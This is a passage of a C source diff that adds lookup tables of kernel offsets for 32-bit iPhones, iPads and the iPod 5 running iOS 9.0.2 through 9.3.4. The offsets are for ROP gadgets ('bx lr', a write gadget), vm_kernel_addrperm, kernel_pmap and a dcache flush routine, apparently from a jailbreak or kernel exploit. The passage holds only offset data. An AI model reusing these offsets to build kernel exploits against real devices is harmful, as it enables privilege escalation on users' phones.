+        case iPad23_iOS930: return 0xc76b4;
+        case iPad23_iOS931: return 0xc76b4;
+        case iPad23_iOS932: return 0xc76b4;
+        case iPad23_iOS933: return 0xc76b4;
+        case iPad23_iOS934: return 0xc76b4;
+        case iPad24_iOS910: return 0xc7754;
+        case iPad24_iOS920: return 0xc6754;
+        case iPad24_iOS921: return 0xc6754;
+        case iPad24_iOS930: return 0xc76b4;
+        case iPad24_iOS931: return 0xc76b4;
+        case iPad24_iOS932: return 0xc76b4;
+        case iPad24_iOS933: return 0xc76b4;
+        case iPad24_iOS934: return 0xc76b4;
+        case iPad25_iOS902: return 0xc7754;
+        case iPad31_iOS910: return 0xc7754;
+        case iPad31_iOS920: return 0xc6754;
+        case iPad31_iOS921: return 0xc6754;
+        case iPad31_iOS930: return 0xc76b4;
+        case iPad31_iOS931: return 0xc76b4;
+        case iPad31_iOS932: return 0xc76b4;
+        case iPad31_iOS933: return 0xc76b4;
+        case iPad31_iOS934: return 0xc76b4;
+        case iPad32_iOS910: return 0xc7754;
+        case iPad32_iOS920: return 0xc6754;
+        case iPad32_iOS921: return 0xc6754;
+        case iPad32_iOS930: return 0xc76b4;
+        case iPad32_iOS931: return 0xc76b4;
+        case iPad32_iOS932: return 0xc76b4;
+        case iPad32_iOS933: return 0xc76b4;
+        case iPad32_iOS934: return 0xc76b4;
+        case iPad33_iOS902: return 0xc7754;
+        case iPad33_iOS910: return 0xc7754;
+        case iPad33_iOS920: return 0xc6754;
+        case iPad33_iOS921: return 0xc6754;
+        case iPad33_iOS930: return 0xc76b4;
+        case iPad33_iOS931: return 0xc76b4;
+        case iPad33_iOS932: return 0xc76b4;
+        case iPad33_iOS933: return 0xc76b4;
+        case iPad33_iOS934: return 0xc76b4;
+        case iPad34_iOS910: return 0xcb87c;
+        case iPad34_iOS920: return 0xca87c;
+        case iPad34_iOS921: return 0xca87c;
+        case iPad34_iOS930: return 0xcb7dc;
+        case iPad34_iOS931: return 0xcb7dc;
+        case iPad34_iOS932: return 0xcb7dc;
+        case iPad34_iOS933: return 0xcb7dc;
+        case iPad34_iOS934: return 0xcb7dc;
+        case iPad35_iOS910: return 0xcb87c;
+        case iPad35_iOS920: return 0xca87c;
+        case iPad35_iOS921: return 0xca87c;
+        case iPad35_iOS930: return 0xcb7dc;
+        case iPad35_iOS931: return 0xcb7dc;
+        case iPad35_iOS932: return 0xcb7dc;
+        case iPad35_iOS933: return 0xcb7dc;
+        case iPad35_iOS934: return 0xcb7dc;
+        case iPad36_iOS910: return 0xcb87c;
+        case iPad36_iOS920: return 0xca87c;
+        case iPad36_iOS921: return 0xca87c;
+        case iPad36_iOS930: return 0xcb7dc;
+        case iPad36_iOS931: return 0xcb7dc;
+        case iPad36_iOS932: return 0xcb7dc;
+        case iPad36_iOS933: return 0xcb7dc;
+        case iPad36_iOS934: return 0xcb7dc;
+        case iPod51_iOS910: return 0xc7754;
+        case iPod51_iOS920: return 0xc6754;
+        case iPod51_iOS921: return 0xc6754;
+        case iPod51_iOS930: return 0xc76b4;
+        case iPod51_iOS931: return 0xc76b4;
+        case iPod51_iOS932: return 0xc76b4;
+        case iPod51_iOS933: return 0xc76b4;
+        case iPod51_iOS934: return 0xc76b4;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_bx_lr(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xd97d2;
+        case iPhone41_iOS910: return 0xd97d2;
+        case iPhone41_iOS920: return 0xd8752;
+        case iPhone41_iOS921: return 0xd8752;
+        case iPhone41_iOS930: return 0xd984a;
+        case iPhone41_iOS931: return 0xd984a;
+        case iPhone41_iOS932: return 0xd984a;
+        case iPhone41_iOS933: return 0xd983a;
+        case iPhone41_iOS934: return 0xd983a;
+        case iPhone51_iOS910: return 0xde9fe;
+        case iPhone51_iOS920: return 0xdd9de;
+        case iPhone51_iOS921: return 0xdd9de;
+        case iPhone51_iOS930: return 0xdea4a;
+        case iPhone51_iOS931: return 0xdea4a;
+        case iPhone51_iOS932: return 0xdea4a;
+        case iPhone51_iOS933: return 0xdea4a;
+        case iPhone51_iOS934: return 0xdea4a;
+        case iPhone52_iOS902: return 0xde9fe;
+        case iPhone52_iOS910: return 0xde9fe;
+        case iPhone52_iOS920: return 0xdd9de;
+        case iPhone52_iOS921: return 0xdd9de;
+        case iPhone52_iOS930: return 0xdea4a;
+        case iPhone52_iOS931: return 0xdea4a;
+        case iPhone52_iOS932: return 0xdea4a;
+        case iPhone52_iOS933: return 0xdea4a;
+        case iPhone52_iOS934: return 0xdea4a;
+        case iPhone53_iOS910: return 0xde9fe;
+        case iPhone53_iOS920: return 0xdd9de;
+        case iPhone53_iOS921: return 0xdd9de;
+        case iPhone53_iOS930: return 0xdea4a;
+        case iPhone53_iOS931: return 0xdea4a;
+        case iPhone53_iOS932: return 0xdea4a;
+        case iPhone53_iOS933: return 0xdea4a;
+        case iPhone53_iOS934: return 0xdea4a;
+        case iPhone54_iOS910: return 0xde9fe;
+        case iPhone54_iOS920: return 0xdd9de;
+        case iPhone54_iOS921: return 0xdd9de;
+        case iPhone54_iOS930: return 0xdea4a;
+        case iPhone54_iOS931: return 0xdea4a;
+        case iPhone54_iOS932: return 0xdea4a;
+        case iPhone54_iOS933: return 0xdea4a;
+        case iPhone54_iOS934: return 0xdea4a;
+        case iPad21_iOS910: return 0xd97d2;
+        case iPad21_iOS920: return 0xd8752;
+        case iPad21_iOS921: return 0xd8752;
+        case iPad21_iOS930: return 0xd984a;
+        case iPad21_iOS931: return 0xd984a;
+        case iPad21_iOS932: return 0xd984a;
+        case iPad21_iOS933: return 0xd983a;
+        case iPad21_iOS934: return 0xd983a;
+        case iPad22_iOS910: return 0xd97d2;
+        case iPad22_iOS920: return 0xd8752;
+        case iPad22_iOS921: return 0xd8752;
+        case iPad22_iOS930: return 0xd984a;
+        case iPad22_iOS931: return 0xd984a;
+        case iPad22_iOS932: return 0xd984a;
+        case iPad22_iOS933: return 0xd983a;
+        case iPad22_iOS934: return 0xd983a;
+        case iPad23_iOS910: return 0xd97d2;
+        case iPad23_iOS920: return 0xd8752;
+        case iPad23_iOS921: return 0xd8752;
+        case iPad23_iOS930: return 0xd984a;
+        case iPad23_iOS931: return 0xd984a;
+        case iPad23_iOS932: return 0xd984a;
+        case iPad23_iOS933: return 0xd983a;
+        case iPad23_iOS934: return 0xd983a;
+        case iPad24_iOS910: return 0xd97d2;
+        case iPad24_iOS920: return 0xd8752;
+        case iPad24_iOS921: return 0xd8752;
+        case iPad24_iOS930: return 0xd984a;
+        case iPad24_iOS931: return 0xd984a;
+        case iPad24_iOS932: return 0xd984a;
+        case iPad24_iOS933: return 0xd983a;
+        case iPad24_iOS934: return 0xd983a;
+        case iPad25_iOS902: return 0xd97d2;
+        case iPad31_iOS910: return 0xd97d2;
+        case iPad31_iOS920: return 0xd8752;
+        case iPad31_iOS921: return 0xd8752;
+        case iPad31_iOS930: return 0xd984a;
+        case iPad31_iOS931: return 0xd984a;
+        case iPad31_iOS932: return 0xd984a;
+        case iPad31_iOS933: return 0xd983a;
+        case iPad31_iOS934: return 0xd983a;
+        case iPad32_iOS910: return 0xd97d2;
+        case iPad32_iOS920: return 0xd8752;
+        case iPad32_iOS921: return 0xd8752;
+        case iPad32_iOS930: return 0xd984a;
+        case iPad32_iOS931: return 0xd984a;
+        case iPad32_iOS932: return 0xd984a;
+        case iPad32_iOS933: return 0xd983a;
+        case iPad32_iOS934: return 0xd983a;
+        case iPad33_iOS902: return 0xd97d2;
+        case iPad33_iOS910: return 0xd97d2;
+        case iPad33_iOS920: return 0xd8752;
+        case iPad33_iOS921: return 0xd8752;
+        case iPad33_iOS930: return 0xd984a;
+        case iPad33_iOS931: return 0xd984a;
+        case iPad33_iOS932: return 0xd984a;
+        case iPad33_iOS933: return 0xd983a;
+        case iPad33_iOS934: return 0xd983a;
+        case iPad34_iOS910: return 0xde9fe;
+        case iPad34_iOS920: return 0xdd9de;
+        case iPad34_iOS921: return 0xdd9de;
+        case iPad34_iOS930: return 0xdea4a;
+        case iPad34_iOS931: return 0xdea4a;
+        case iPad34_iOS932: return 0xdea4a;
+        case iPad34_iOS933: return 0xdea4a;
+        case iPad34_iOS934: return 0xdea4a;
+        case iPad35_iOS910: return 0xde9fe;
+        case iPad35_iOS920: return 0xdd9de;
+        case iPad35_iOS921: return 0xdd9de;
+        case iPad35_iOS930: return 0xdea4a;
+        case iPad35_iOS931: return 0xdea4a;
+        case iPad35_iOS932: return 0xdea4a;
+        case iPad35_iOS933: return 0xdea4a;
+        case iPad35_iOS934: return 0xdea4a;
+        case iPad36_iOS910: return 0xde9fe;
+        case iPad36_iOS920: return 0xdd9de;
+        case iPad36_iOS921: return 0xdd9de;
+        case iPad36_iOS930: return 0xdea4a;
+        case iPad36_iOS931: return 0xdea4a;
+        case iPad36_iOS932: return 0xdea4a;
+        case iPad36_iOS933: return 0xdea4a;
+        case iPad36_iOS934: return 0xdea4a;
+        case iPod51_iOS910: return 0xd97d2;
+        case iPod51_iOS920: return 0xd8752;
+        case iPod51_iOS921: return 0xd8752;
+        case iPod51_iOS930: return 0xd984a;
+        case iPod51_iOS931: return 0xd984a;
+        case iPod51_iOS932: return 0xd984a;
+        case iPod51_iOS933: return 0xd983a;
+        case iPod51_iOS934: return 0xd983a;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_write_gadget(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xc7488;
+        case iPhone41_iOS910: return 0xc7488;
+        case iPhone41_iOS920: return 0xc6488;
+        case iPhone41_iOS921: return 0xc6488;
+        case iPhone41_iOS930: return 0xc73e8;
+        case iPhone41_iOS931: return 0xc73e8;
+        case iPhone41_iOS932: return 0xc73e8;
+        case iPhone41_iOS933: return 0xc73e8;
+        case iPhone41_iOS934: return 0xc73e8;
+        case iPhone51_iOS910: return 0xcb5a8;
+        case iPhone51_iOS920: return 0xca5a8;
+        case iPhone51_iOS921: return 0xca5a8;
+        case iPhone51_iOS930: return 0xcb508;
+        case iPhone51_iOS931: return 0xcb508;
+        case iPhone51_iOS932: return 0xcb508;
+        case iPhone51_iOS933: return 0xcb508;
+        case iPhone51_iOS934: return 0xcb508;
+        case iPhone52_iOS902: return 0xcb5a8;
+        case iPhone52_iOS910: return 0xcb5a8;
+        case iPhone52_iOS920: return 0xca5a8;
+        case iPhone52_iOS921: return 0xca5a8;
+        case iPhone52_iOS930: return 0xcb508;
+        case iPhone52_iOS931: return 0xcb508;
+        case iPhone52_iOS932: return 0xcb508;
+        case iPhone52_iOS933: return 0xcb508;
+        case iPhone52_iOS934: return 0xcb508;
+        case iPhone53_iOS910: return 0xcb5a8;
+        case iPhone53_iOS920: return 0xca5a8;
+        case iPhone53_iOS921: return 0xca5a8;
+        case iPhone53_iOS930: return 0xcb508;
+        case iPhone53_iOS931: return 0xcb508;
+        case iPhone53_iOS932: return 0xcb508;
+        case iPhone53_iOS933: return 0xcb508;
+        case iPhone53_iOS934: return 0xcb508;
+        case iPhone54_iOS910: return 0xcb5a8;
+        case iPhone54_iOS920: return 0xca5a8;
+        case iPhone54_iOS921: return 0xca5a8;
+        case iPhone54_iOS930: return 0xcb508;
+        case iPhone54_iOS931: return 0xcb508;
+        case iPhone54_iOS932: return 0xcb508;
+        case iPhone54_iOS933: return 0xcb508;
+        case iPhone54_iOS934: return 0xcb508;
+        case iPad21_iOS910: return 0xc7488;
+        case iPad21_iOS920: return 0xc6488;
+        case iPad21_iOS921: return 0xc6488;
+        case iPad21_iOS930: return 0xc73e8;
+        case iPad21_iOS931: return 0xc73e8;
+        case iPad21_iOS932: return 0xc73e8;
+        case iPad21_iOS933: return 0xc73e8;
+        case iPad21_iOS934: return 0xc73e8;
+        case iPad22_iOS910: return 0xc7488;
+        case iPad22_iOS920: return 0xc6488;
+        case iPad22_iOS921: return 0xc6488;
+        case iPad22_iOS930: return 0xc73e8;
+        case iPad22_iOS931: return 0xc73e8;
+        case iPad22_iOS932: return 0xc73e8;
+        case iPad22_iOS933: return 0xc73e8;
+        case iPad22_iOS934: return 0xc73e8;
+        case iPad23_iOS910: return 0xc7488;
+        case iPad23_iOS920: return 0xc6488;
+        case iPad23_iOS921: return 0xc6488;
+        case iPad23_iOS930: return 0xc73e8;
+        case iPad23_iOS931: return 0xc73e8;
+        case iPad23_iOS932: return 0xc73e8;
+        case iPad23_iOS933: return 0xc73e8;
+        case iPad23_iOS934: return 0xc73e8;
+        case iPad24_iOS910: return 0xc7488;
+        case iPad24_iOS920: return 0xc6488;
+        case iPad24_iOS921: return 0xc6488;
+        case iPad24_iOS930: return 0xc73e8;
+        case iPad24_iOS931: return 0xc73e8;
+        case iPad24_iOS932: return 0xc73e8;
+        case iPad24_iOS933: return 0xc73e8;
+        case iPad24_iOS934: return 0xc73e8;
+        case iPad25_iOS902: return 0xc7488;
+        case iPad31_iOS910: return 0xc7488;
+        case iPad31_iOS920: return 0xc6488;
+        case iPad31_iOS921: return 0xc6488;
+        case iPad31_iOS930: return 0xc73e8;
+        case iPad31_iOS931: return 0xc73e8;
+        case iPad31_iOS932: return 0xc73e8;
+        case iPad31_iOS933: return 0xc73e8;
+        case iPad31_iOS934: return 0xc73e8;
+        case iPad32_iOS910: return 0xc7488;
+        case iPad32_iOS920: return 0xc6488;
+        case iPad32_iOS921: return 0xc6488;
+        case iPad32_iOS930: return 0xc73e8;
+        case iPad32_iOS931: return 0xc73e8;
+        case iPad32_iOS932: return 0xc73e8;
+        case iPad32_iOS933: return 0xc73e8;
+        case iPad32_iOS934: return 0xc73e8;
+        case iPad33_iOS902: return 0xc7488;
+        case iPad33_iOS910: return 0xc7488;
+        case iPad33_iOS920: return 0xc6488;
+        case iPad33_iOS921: return 0xc6488;
+        case iPad33_iOS930: return 0xc73e8;
+        case iPad33_iOS931: return 0xc73e8;
+        case iPad33_iOS932: return 0xc73e8;
+        case iPad33_iOS933: return 0xc73e8;
+        case iPad33_iOS934: return 0xc73e8;
+        case iPad34_iOS910: return 0xcb5a8;
+        case iPad34_iOS920: return 0xca5a8;
+        case iPad34_iOS921: return 0xca5a8;
+        case iPad34_iOS930: return 0xcb508;
+        case iPad34_iOS931: return 0xcb508;
+        case iPad34_iOS932: return 0xcb508;
+        case iPad34_iOS933: return 0xcb508;
+        case iPad34_iOS934: return 0xcb508;
+        case iPad35_iOS910: return 0xcb5a8;
+        case iPad35_iOS920: return 0xca5a8;
+        case iPad35_iOS921: return 0xca5a8;
+        case iPad35_iOS930: return 0xcb508;
+        case iPad35_iOS931: return 0xcb508;
+        case iPad35_iOS932: return 0xcb508;
+        case iPad35_iOS933: return 0xcb508;
+        case iPad35_iOS934: return 0xcb508;
+        case iPad36_iOS910: return 0xcb5a8;
+        case iPad36_iOS920: return 0xca5a8;
+        case iPad36_iOS921: return 0xca5a8;
+        case iPad36_iOS930: return 0xcb508;
+        case iPad36_iOS931: return 0xcb508;
+        case iPad36_iOS932: return 0xcb508;
+        case iPad36_iOS933: return 0xcb508;
+        case iPad36_iOS934: return 0xcb508;
+        case iPod51_iOS910: return 0xc7488;
+        case iPod51_iOS920: return 0xc6488;
+        case iPod51_iOS921: return 0xc6488;
+        case iPod51_iOS930: return 0xc73e8;
+        case iPod51_iOS931: return 0xc73e8;
+        case iPod51_iOS932: return 0xc73e8;
+        case iPod51_iOS933: return 0xc73e8;
+        case iPod51_iOS934: return 0xc73e8;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_vm_kernel_addrperm(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x455fa0;
+        case iPhone41_iOS910: return 0x457030;
+        case iPhone41_iOS920: return 0x44e840;
+        case iPhone41_iOS921: return 0x44e840;
+        case iPhone41_iOS930: return 0x455844;
+        case iPhone41_iOS931: return 0x455844;
+        case iPhone41_iOS932: return 0x455844;
+        case iPhone41_iOS933: return 0x455844;
+        case iPhone41_iOS934: return 0x455844;
+        case iPhone51_iOS910: return 0x45e154;
+        case iPhone51_iOS920: return 0x455964;
+        case iPhone51_iOS921: return 0x455964;
+        case iPhone51_iOS930: return 0x45d978;
+        case iPhone51_iOS931: return 0x45d978;
+        case iPhone51_iOS932: return 0x45d978;
+        case iPhone51_iOS933: return 0x45d978;
+        case iPhone51_iOS934: return 0x45d978;
+        case iPhone52_iOS902: return 0x45c0c4;
+        case iPhone52_iOS910: return 0x45e154;
+        case iPhone52_iOS920: return 0x455964;
+        case iPhone52_iOS921: return 0x455964;
+        case iPhone52_iOS930: return 0x45d978;
+        case iPhone52_iOS931: return 0x45d978;
+        case iPhone52_iOS932: return 0x45d978;
+        case iPhone52_iOS933: return 0x45d978;
+        case iPhone52_iOS934: return 0x45d978;
+        case iPhone53_iOS910: return 0x45e154;
+        case iPhone53_iOS920: return 0x455964;
+        case iPhone53_iOS921: return 0x455964;
+        case iPhone53_iOS930: return 0x45d978;
+        case iPhone53_iOS931: return 0x45d978;
+        case iPhone53_iOS932: return 0x45d978;
+        case iPhone53_iOS933: return 0x45d978;
+        case iPhone53_iOS934: return 0x45d978;
+        case iPhone54_iOS910: return 0x45e154;
+        case iPhone54_iOS920: return 0x455964;
+        case iPhone54_iOS921: return 0x455964;
+        case iPhone54_iOS930: return 0x45D978;
+        case iPhone54_iOS931: return 0x45d978;
+        case iPhone54_iOS932: return 0x45d978;
+        case iPhone54_iOS933: return 0x45d978;
+        case iPhone54_iOS934: return 0x45d978;
+        case iPad21_iOS910: return 0x457030;
+        case iPad21_iOS920: return 0x44e840;
+        case iPad21_iOS921: return 0x44e840;
+        case iPad21_iOS930: return 0x455844;
+        case iPad21_iOS931: return 0x455844;
+        case iPad21_iOS932: return 0x455844;
+        case iPad21_iOS933: return 0x455844;
+        case iPad21_iOS934: return 0x455844;
+        case iPad22_iOS910: return 0x457030;
+        case iPad22_iOS920: return 0x44e840;
+        case iPad22_iOS921: return 0x44e840;
+        case iPad22_iOS930: return 0x455844;
+        case iPad22_iOS931: return 0x455844;
+        case iPad22_iOS932: return 0x455844;
+        case iPad22_iOS933: return 0x455844;
+        case iPad22_iOS934: return 0x455844;
+        case iPad23_iOS910: return 0x457030;
+        case iPad23_iOS920: return 0x44e840;
+        case iPad23_iOS921: return 0x44e840;
+        case iPad23_iOS930: return 0x455844;
+        case iPad23_iOS931: return 0x455844;
+        case iPad23_iOS932: return 0x455844;
+        case iPad23_iOS933: return 0x455844;
+        case iPad23_iOS934: return 0x455844;
+        case iPad24_iOS910: return 0x457030;
+        case iPad24_iOS920: return 0x44e840;
+        case iPad24_iOS921: return 0x44e840;
+        case iPad24_iOS930: return 0x455844;
+        case iPad24_iOS931: return 0x455844;
+        case iPad24_iOS932: return 0x455844;
+        case iPad24_iOS933: return 0x455844;
+        case iPad24_iOS934: return 0x455844;
+        case iPad25_iOS902: return 0x455fa0;
+        case iPad31_iOS910: return 0x457030;
+        case iPad31_iOS920: return 0x44e840;
+        case iPad31_iOS921: return 0x44e840;
+        case iPad31_iOS930: return 0x455844;
+        case iPad31_iOS931: return 0x455844;
+        case iPad31_iOS932: return 0x455844;
+        case iPad31_iOS933: return 0x455844;
+        case iPad31_iOS934: return 0x455844;
+        case iPad32_iOS910: return 0x457030;
+        case iPad32_iOS920: return 0x44e840;
+        case iPad32_iOS921: return 0x44e840;
+        case iPad32_iOS930: return 0x455844;
+        case iPad32_iOS931: return 0x455844;
+        case iPad32_iOS932: return 0x455844;
+        case iPad32_iOS933: return 0x455844;
+        case iPad32_iOS934: return 0x455844;
+        case iPad33_iOS902: return 0x455fa0;
+        case iPad33_iOS910: return 0x457030;
+        case iPad33_iOS920: return 0x44e840;
+        case iPad33_iOS921: return 0x44e840;
+        case iPad33_iOS930: return 0x455844;
+        case iPad33_iOS931: return 0x455844;
+        case iPad33_iOS932: return 0x455844;
+        case iPad33_iOS933: return 0x455844;
+        case iPad33_iOS934: return 0x455844;
+        case iPad34_iOS910: return 0x45e154;
+        case iPad34_iOS920: return 0x455964;
+        case iPad34_iOS921: return 0x455964;
+        case iPad34_iOS930: return 0x45d978;
+        case iPad34_iOS931: return 0x45d978;
+        case iPad34_iOS932: return 0x45d978;
+        case iPad34_iOS933: return 0x45d978;
+        case iPad34_iOS934: return 0x45d978;
+        case iPad35_iOS910: return 0x45e154;
+        case iPad35_iOS920: return 0x455964;
+        case iPad35_iOS921: return 0x455964;
+        case iPad35_iOS930: return 0x45d978;
+        case iPad35_iOS931: return 0x45d978;
+        case iPad35_iOS932: return 0x45d978;
+        case iPad35_iOS933: return 0x45d978;
+        case iPad35_iOS934: return 0x45d978;
+        case iPad36_iOS910: return 0x45e154;
+        case iPad36_iOS920: return 0x455964;
+        case iPad36_iOS921: return 0x455964;
+        case iPad36_iOS930: return 0x45d978;
+        case iPad36_iOS931: return 0x45d978;
+        case iPad36_iOS932: return 0x45d978;
+        case iPad36_iOS933: return 0x45d978;
+        case iPad36_iOS934: return 0x45d978;
+        case iPod51_iOS910: return 0x457030;
+        case iPod51_iOS920: return 0x44e840;
+        case iPod51_iOS921: return 0x44e840;
+        case iPod51_iOS930: return 0x455844;
+        case iPod51_iOS931: return 0x455844;
+        case iPod51_iOS932: return 0x455844;
+        case iPod51_iOS933: return 0x455844;
+        case iPod51_iOS934: return 0x455844;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_kernel_pmap(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x3f7444;
+        case iPhone41_iOS910: return 0x3f8444;
+        case iPhone41_iOS920: return 0x3ef444;
+        case iPhone41_iOS921: return 0x3ef444;
+        case iPhone41_iOS930: return 0x3f6454;
+        case iPhone41_iOS931: return 0x3f6454;
+        case iPhone41_iOS932: return 0x3f6454;
+        case iPhone41_iOS933: return 0x3f6454;
+        case iPhone41_iOS934: return 0x3f6454;
+        case iPhone51_iOS910: return 0x3ff444;
+        case iPhone51_iOS920: return 0x3f6444;
+        case iPhone51_iOS921: return 0x3f6444;
+        case iPhone51_iOS930: return 0x3fe454;
+        case iPhone51_iOS931: return 0x3fe454;
+        case iPhone51_iOS932: return 0x3fe454;
+        case iPhone51_iOS933: return 0x3fe454;
+        case iPhone51_iOS934: return 0x3fe454;
+        case iPhone52_iOS902: return 0x3fd444;
+        case iPhone52_iOS910: return 0x3ff444;
+        case iPhone52_iOS920: return 0x3f6444;
+        case iPhone52_iOS921: return 0x3f6444;
+        case iPhone52_iOS930: return 0x3fe454;
+        case iPhone52_iOS931: return 0x3fe454;
+        case iPhone52_iOS932: return 0x3fe454;
+        case iPhone52_iOS933: return 0x3fe454;
+        case iPhone52_iOS934: return 0x3fe454;
+        case iPhone53_iOS910: return 0x3ff444;
+        case iPhone53_iOS920: return 0x3f6444;
+        case iPhone53_iOS921: return 0x3f6444;
+        case iPhone53_iOS930: return 0x3fe454;
+        case iPhone53_iOS931: return 0x3fe454;
+        case iPhone53_iOS932: return 0x3fe454;
+        case iPhone53_iOS933: return 0x3fe454;
+        case iPhone53_iOS934: return 0x3fe454;
+        case iPhone54_iOS910: return 0x3ff444;
+        case iPhone54_iOS920: return 0x3f6444;
+        case iPhone54_iOS921: return 0x3f6444;
+        case iPhone54_iOS930: return 0x3fe454;
+        case iPhone54_iOS931: return 0x3fe454;
+        case iPhone54_iOS932: return 0x3fe454;
+        case iPhone54_iOS933: return 0x3fe454;
+        case iPhone54_iOS934: return 0x3fe454;
+        case iPad21_iOS910: return 0x3f8444;
+        case iPad21_iOS920: return 0x3ef444;
+        case iPad21_iOS921: return 0x3ef444;
+        case iPad21_iOS930: return 0x3f6454;
+        case iPad21_iOS931: return 0x3f6454;
+        case iPad21_iOS932: return 0x3f6454;
+        case iPad21_iOS933: return 0x3f6454;
+        case iPad21_iOS934: return 0x3f6454;
+        case iPad22_iOS910: return 0x3f8444;
+        case iPad22_iOS920: return 0x3ef444;
+        case iPad22_iOS921: return 0x3ef444;
+        case iPad22_iOS930: return 0x3f6454;
+        case iPad22_iOS931: return 0x3f6454;
+        case iPad22_iOS932: return 0x3f6454;
+        case iPad22_iOS933: return 0x3f6454;
+        case iPad22_iOS934: return 0x3f6454;
+        case iPad23_iOS910: return 0x3f8444;
+        case iPad23_iOS920: return 0x3ef444;
+        case iPad23_iOS921: return 0x3ef444;
+        case iPad23_iOS930: return 0x3f6454;
+        case iPad23_iOS931: return 0x3f6454;
+        case iPad23_iOS932: return 0x3f6454;
+        case iPad23_iOS933: return 0x3f6454;
+        case iPad23_iOS934: return 0x3f6454;
+        case iPad24_iOS910: return 0x3f8444;
+        case iPad24_iOS920: return 0x3ef444;
+        case iPad24_iOS921: return 0x3ef444;
+        case iPad24_iOS930: return 0x3f6454;
+        case iPad24_iOS931: return 0x3f6454;
+        case iPad24_iOS932: return 0x3f6454;
+        case iPad24_iOS933: return 0x3f6454;
+        case iPad24_iOS934: return 0x3f6454;
+        case iPad25_iOS902: return 0x3f7444;
+        case iPad31_iOS910: return 0x3f8444;
+        case iPad31_iOS920: return 0x3ef444;
+        case iPad31_iOS921: return 0x3ef444;
+        case iPad31_iOS930: return 0x3f6454;
+        case iPad31_iOS931: return 0x3f6454;
+        case iPad31_iOS932: return 0x3f6454;
+        case iPad31_iOS933: return 0x3f6454;
+        case iPad31_iOS934: return 0x3f6454;
+        case iPad32_iOS910: return 0x3f8444;
+        case iPad32_iOS920: return 0x3ef444;
+        case iPad32_iOS921: return 0x3ef444;
+        case iPad32_iOS930: return 0x3f6454;
+        case iPad32_iOS931: return 0x3f6454;
+        case iPad32_iOS932: return 0x3f6454;
+        case iPad32_iOS933: return 0x3f6454;
+        case iPad32_iOS934: return 0x3f6454;
+        case iPad33_iOS902: return 0x3f7444;
+        case iPad33_iOS910: return 0x3f8444;
+        case iPad33_iOS920: return 0x3ef444;
+        case iPad33_iOS921: return 0x3ef444;
+        case iPad33_iOS930: return 0x3f6454;
+        case iPad33_iOS931: return 0x3f6454;
+        case iPad33_iOS932: return 0x3f6454;
+        case iPad33_iOS933: return 0x3f6454;
+        case iPad33_iOS934: return 0x3f6454;
+        case iPad34_iOS910: return 0x3ff444;
+        case iPad34_iOS920: return 0x3f6444;
+        case iPad34_iOS921: return 0x3f6444;
+        case iPad34_iOS930: return 0x3fe454;
+        case iPad34_iOS931: return 0x3fe454;
+        case iPad34_iOS932: return 0x3fe454;
+        case iPad34_iOS933: return 0x3fe454;
+        case iPad34_iOS934: return 0x3fe454;
+        case iPad35_iOS910: return 0x3ff444;
+        case iPad35_iOS920: return 0x3f6444;
+        case iPad35_iOS921: return 0x3f6444;
+        case iPad35_iOS930: return 0x3fe454;
+        case iPad35_iOS931: return 0x3fe454;
+        case iPad35_iOS932: return 0x3fe454;
+        case iPad35_iOS933: return 0x3fe454;
+        case iPad35_iOS934: return 0x3fe454;
+        case iPad36_iOS910: return 0x3ff444;
+        case iPad36_iOS920: return 0x3f6444;
+        case iPad36_iOS921: return 0x3f6444;
+        case iPad36_iOS930: return 0x3fe454;
+        case iPad36_iOS931: return 0x3fe454;
+        case iPad36_iOS932: return 0x3fe454;
+        case iPad36_iOS933: return 0x3fe454;
+        case iPad36_iOS934: return 0x3fe454;
+        case iPod51_iOS910: return 0x3f8444;
+        case iPod51_iOS920: return 0x3ef444;
+        case iPod51_iOS921: return 0x3ef444;
+        case iPod51_iOS930: return 0x3f6454;
+        case iPod51_iOS931: return 0x3f6454;
+        case iPod51_iOS932: return 0x3f6454;
+        case iPod51_iOS933: return 0x3f6454;
+        case iPod51_iOS934: return 0x3f6454;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_flush_dcache(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xbc9b8;
+        case iPhone41_iOS910: return 0xbcb7c;
+        case iPhone41_iOS920: return 0xbb710;
+        case iPhone41_iOS921: return 0xbb760;
+        case iPhone41_iOS930: return 0xbc250;
+        case iPhone41_iOS931: return 0xbc250;
+        case iPhone41_iOS932: return 0xbc260;
+        case iPhone41_iOS933: return 0xbc1d4;
+        case iPhone41_iOS934: return 0xbc1d4;
+        case iPhone51_iOS910: return 0xbf770;
+        case iPhone51_iOS920: return 0xbe598;
+        case iPhone51_iOS921: return 0xbe5d8;
+        case iPhone51_iOS930: return 0xbf284;
+        case iPhone51_iOS931: return 0xbf284;
+        case iPhone51_iOS932: return 0xbf274;
+        case iPhone51_iOS933: return 0xbf404;
+        case iPhone51_iOS934: return 0xbf404;
+        case iPhone52_iOS902: return 0xbf5ac;
+        case iPhone52_iOS910: return 0xbf770;
+        case iPhone52_iOS920: return 0xbe598;
+        case iPhone52_iOS921: return 0xbe610;
+        case iPhone52_iOS930: return 0xbf2bc;
+        case iPhone52_iOS931: return 0xbf284;
+        case iPhone52_iOS932: return 0xbf284;
+        case iPhone52_iOS933: return 0xbf404;
+        case iPhone52_iOS934: return 0xbf404;
+        case iPhone53_iOS910: return 0xbf770;
+        case iPhone53_iOS920: return 0xbe598;
+        case iPhone53_iOS921: return 0xbe610;
+        case iPhone53_iOS930: return 0xbf284;
+        case iPhone53_iOS931: return 0xbf284;
+        case iPhone53_iOS932: return 0xbf274;
+        case iPhone53_iOS933: return 0xbf404;
+        case iPhone53_iOS934: return 0xbf404;
+        case iPhone54_iOS910: return 0xbf770;
+        case iPhone54_iOS920: return 0xbe598;
+        case iPhone54_iOS921: return 0xbe5d8;
+        case iPhone54_iOS930: return 0xbf284;
+        case iPhone54_iOS931: return 0xbf284;
+        case iPhone54_iOS932: return 0xbf274;
+        case iPhone54_iOS933: return 0xbf404;
+        case iPhone54_iOS934: return 0xbf404;
+        case iPad21_iOS910: return 0xbcb7c;
+        case iPad21_iOS920: return 0xbb710;
+        case iPad21_iOS921: return 0xbb760;
+        case iPad21_iOS930: return 0xbc250;
+        case iPad21_iOS931: return 0xbc250;
